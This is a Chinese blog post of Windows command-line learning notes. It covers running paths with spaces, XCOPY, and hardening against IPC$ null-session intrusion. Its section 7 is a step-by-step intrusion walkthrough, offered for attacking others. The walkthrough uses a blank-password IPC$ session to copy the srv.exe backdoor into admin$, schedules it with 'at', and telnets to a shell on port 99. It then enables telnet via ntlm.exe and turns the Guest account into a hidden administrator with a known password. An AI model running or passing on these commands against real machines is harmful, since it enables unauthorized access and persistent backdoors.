DOS学习心得(一)

1.如何运行D:\Program Files\TTPlayer\ttplayer.exe 程序?

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd\

C:\>D:\program files\ttplayer\ttplayer.exe

'D:\program' 不是内部或外部命令,也不是可运行的程序

或批处理文件。

C:\>e:\ebook\hw-routesim.exe

C:\>

上面的两个程序的区别就在于根目录的文件名字,D:\program files 这个文件的program files之间有个空格,dos执行这个命令的时候,它这样执行这个命令的C:\>D:\program ^^ files\ttplayer\ttplayer.exe 把'D:\program' 作为是内部或外部命令,和可运行的程序或批处理文件。下面的就不一样了,我们可以直接执行这个e:\ebook\hw-routesim.exe程序了~~~

要运行上面的程序的,这样就行了:

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd\

C:\>d:

D:\>cd program files

D:\Program Files>ttplayer\ttplayer.exe

D:\Program Files>

2.子目录及文件拷贝命令:XCOPY

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd\

C:\>e:

E:\>xcopy 网站文件夹\*.* f:\gem\

网站文件夹\1010.txt

网站文件夹\Gem说明.txt

复制了 2 个文件

E:\>xcopy 网站文件夹\*.* f:\gem\ /s /e

改写 F:\gem\1010.txt  (Yes/No/All)?y

网站文件夹\1010.txt

改写 F:\gem\Gem说明.txt  (Yes/No/All)?a

网站文件夹\Gem说明.txt

网站文件夹\考研资料\2006年研究生入学考试考研大纲:数学一.txt

网站文件夹\考研资料\2007年数学考试大纲.pdf

网站文件夹\考研资料\2007年研究生入学考试考研大纲:数学一.doc

网站文件夹\考研资料\数学考试分析完整版.pdf

复制了 6 个文件

E:\>

3.显示内存状况命令:MEM

为什么我的机器不能显示内存状况?原因不明~~~

4.为什么我的电脑的IPC$  不能删除??

C:\>net share

共享名   资源                        注释

-------------------------------------------------------------------------------

IPC$                                         远程 IPC

命令成功完成。

C:\>net share ipc$ /delete

发生系统错误 5。

拒绝访问。

C:\>

5.如何防范ipc$入侵

(1)禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit,找到如下组建

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

(2)禁止默认共享

1)察看本地共享资源

运行-cmd-输入net share

2)删除共享(每次输入一个)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,......可以继续删除)

3)停止server服务

net stop server /y (重新启动后server服务会重新开启)

4)修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

(3)永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

(4)安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

(5)设置复杂密码,防止通过ipc$穷举密码

6.相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:""(一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

7.经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

(1). C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

(2). C:\>copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

(3). C:\>net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

(4). C:\>at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

(5). C:\>net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

(6). C:\>telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

(7).C:\>copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

(8). C:\WINNT\system32>ntlm

输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

(9). Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

(10). C:\>net user guest /active:yes

将对方的Guest用户激活

(11). C:\>net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

(12). C:\>net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

8.总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。

http://download2.gbaopan.com/c79bbb40632940f4886fda15297ece30.gbp?supplierID=1683469

论坛"DOS之家"版块: http://bbs.arongsoft.com/list.asp?boardid=14

转载于:https://www.cnblogs.com/Gemgin/archive/2013/06/13/3136495.html

技巧心得:DOS学习心得(一)相关推荐

  1. 学数学计算机课的心得,课程学习心得体会

    课程学习心得体会本人在高中数学新课程培训中认真听取专家讲课,对于新课标有一定的心得体会,现具体汇报如下.高中数学课程是义务教育或普通高级中学的一门主要课程,它从国际意识.时代需求.国民素质.个性发展的 ...

  2. html作业心得体会,学习心得体会范文6篇

    以下是留学网提供的学习心得体会范文,想了解更多情况请关注出国留学网. 学习心得体会范文1: 学习就像一个无望无际的海洋,那样宽广,那样伟大,我们就像一艘小船,在这迷茫的大海中,寻找着彼岸,而上天对它的 ...

  3. php成绩查询系统的学习心得_PHP学习心得与体会

    PHP 学习心得与体会 我想在讲述自己的学习方式前,对那些期望能从我的文 章中获得有用信息的人说一句心里话: 我的文章不会对您的学习起到实质性的作用,您能否成 功, 还得靠自己的,坚持,坚持,再坚持, ...

  4. 初学python的体会心得-python学习心得:如何入门

    其实还有一个理由要写这篇文章,就是最近发现朋友圈的python广告几乎刷屏了,而且广告很吸引人,以9.9元甚至免费.寓教于乐为噱头,其实免费课程只是做个python介绍,想要进一步学习要交差不多200 ...

  5. 医用计算机学习心得,计算机学习心得体会范文

    跟着信息技能的高速开展并疾速浸透到社会糊口的方方面面,较量争论机日趋成为人们进修.任务.糊口不成短少的根本东西,接上去就跟好范文网小编一同往理解一下对于较量争论机进修心患上领会范文吧! 较量争论机进修 ...

  6. 对oracle的心得体会,学习心得征文活动精选一:Oracle学习的心得体会

    详情: 经常遇到朋友问oracle学习难不难,怎么才能成为高手等等,我想结合我的个人经验简单说几点: 1.打好基础,由浅入深 学习Oracle不能急于求成,寄希望于一天成为一个大侠.学习有个过程,应该 ...

  7. android数据存储心得,android学习心得 轻量级存储SharePreferences

    SharedPreferences是Android中存储简单数据的一个工具类.可以想象它是一个小小的Cookie,它通过用键值对的方式把简单数据类型(boolean.int.float.long和St ...

  8. python列表心得_Python学习心得(第一篇:字符串、列表等)

    一.字符串的应用 1.复数表示:z=a+bj 实部为z.real, 虚数为z.imag.模为abs(z), 在交互模式中,最后一个打印出来的表示会赋值给变量_. 2.字符串写时候新起一行前行末尾要加 ...

  9. linux里shell的心得,Shell学习心得(一):变量

    1.begin 1 #!/bin/bash 2 echo "hello world !" #! 是一个约定的标记,它告诉系统这个脚本需要什么解释器来执行,即使用哪一种 shell. ...

  10. python函数实验心得_python学习心得

    慕课网学习过程中,发现了很多有意思的高阶函数: reduce()函数也是Python内置的一个高阶函数.reduce()函数接收的参数和 map()类似,一个函数 f,一个list,但行为和 map( ...

最新文章

  1. 拒绝 ! = null
  2. 五个超酷Linux命令
  3. 将Jquery序列化后的表单值转换成Json
  4. Building a Space Station--POJ 2031
  5. 太阳能板如何串联_光伏板清洁专用的清洁毛刷
  6. 在C#中利用DirectX实现声音播放
  7. android 自定义透明 等待 dialog,Android自定义Dialog内部透明、外部遮罩效果
  8. 大数据之-Hadoop完全分布式_集群时间同步---大数据之hadoop工作笔记0043
  9. pwd赋值给变量 shell_Shell脚本中的变量详解
  10. JavaScriptSerializer 类
  11. tcp 压力 测试 软件,强大的TcpServer压力测试工具及源码(附突破连接限制的方法和工具)...
  12. 问的书写规则是什么意思_汉字书写规则
  13. Vfed大橙子模板 苹果cms自动采集 的方法
  14. Linux下3种常用的网络测速工具简介
  15. PaddleOCR 识别器数据增强
  16. Windows API一日一练(25)CreateSolidBrush FillRect函数-创建黑色的背景色
  17. 处理ThinkPad X12018按电源键无法开机的问题
  18. torch_points_kernels遭遇 ModuleNotFoundError: No module named ‘torch_points_kernels.points_cpu‘
  19. Android源码学习------SystemUI(二)
  20. 【C++】使用VS2022和GCC编译Xlnt库读取EXCEL

热门文章

  1. matlab色差,科学网—实用图片处理技巧(1)---MATLAB学习笔记 - 冯竟超的博文
  2. 海康威视球机摄像头晚上补光灯闪烁问题
  3. oracle比较日期大小函数输出,oracle 日期比较及惯用函数
  4. Web2.0之Tag标签原理实现浅析
  5. 一页纸商业计划书 (Business Plan) 模板(转载)
  6. fpga开发教程 labview_NILabVIEW高性能FPGA开发者指南.pdf
  7. Dictionary 索引超出数组界限
  8. Java数据结构和算法---程序员常用10种算法
  9. macOS Monterey 12.0.1(21A559) 正式版三分区原版黑苹果镜像
  10. java反射机制面试_java反射机制面试题及答案整理,java反射面试题